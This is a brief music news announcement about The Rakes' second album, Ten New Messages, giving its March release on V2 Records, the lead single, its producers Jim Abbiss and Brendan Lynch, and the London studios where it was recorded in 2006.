The Rakes release their eagerly anticipated second album, Ten New Messages, through V2 Records on Monday 19th March. A single We Danced Together is released a week earlier on 12th March. Ten New Messages is the follow-up to the bands highly acclaimed debut album
Capture/Release, released in 2005.
The album was produced by Jim Abbiss (Arctic Monkey's, Editors, Kasabian) & Brendan Lynch (Primal Scream) and was recorded at Mayfair Studios, The Chapel, and West Point in London in the autumn of 2006.
